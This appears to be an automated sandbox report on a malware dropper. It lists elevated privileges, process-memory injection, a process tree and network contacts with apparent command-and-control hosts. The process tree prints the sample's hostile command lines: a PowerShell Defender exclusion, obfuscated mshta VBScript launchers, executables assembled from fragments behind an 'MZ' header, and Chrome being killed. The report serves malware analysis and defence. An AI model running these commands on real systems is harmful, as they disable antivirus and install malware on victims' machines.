Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20e095683c2b3a0c.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe

Fri2002ce5f91c761.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe

Fri209f6924af86d795.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe

Fri208f5f140853548.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20e095683c2b3a0c.exe

Fri20e095683c2b3a0c.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe

Fri20109b9e174d0fc.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe

Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe

Fri20c0c46650eeb2a.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe

Fri20d5530575e8aa3ed.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri200ae385720d3.exe

Fri200ae385720d3.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe

Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe

Fri2050293ea5.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe

Fri20ee0a6fe195bd09.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe

Fri209d5bfbb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe

Fri20ba391d4469.exe

C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$701B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$801B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 272

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "" == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Fri208f5f140853548.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe

EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /IM "Fri20ba391d4469.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 " == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct ( "WscRiPt.ShElL" ). RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"

C:\Windows\SysWOW64\msiexec.exe

msiexec /Y .\6~iPCLZ.rJ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 480

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 ppp-gl.biz udp
US 8.8.8.8:53 hsiens.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
US 104.155.138.21:80 ppp-gl.biz tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 topniemannpickshop.cc udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 niemannbest.me udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 104.155.138.21:80 ppp-gl.biz tcp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 104.155.138.21:80 ppp-gl.biz tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 107.178.223.183:80 ppp-gl.biz tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 88.221.134.83:80 crl.microsoft.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
N/A 127.0.0.1:49285 tcp
N/A 127.0.0.1:49287 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp

Files

\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe

MD5 789258af8927e9426e113f79a5c2ebcf
SHA1 6c64f717f5fc68e602760fefbc2221fd35fd7530
SHA256 f17e3e76cebd7d97c927151c727d210dca439be0142db2db5a0ccc70d95b9923
SHA512 20cbd892411768fd4774fcb9f47f4eff754687808e58af8597714030e0705b53072b0128b8c32f5254836664276b242f8327427d0d6975cdfe6c3a90f4945ec3

\Users\Admin\AppData\Local\Temp\7zS0BB86396\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
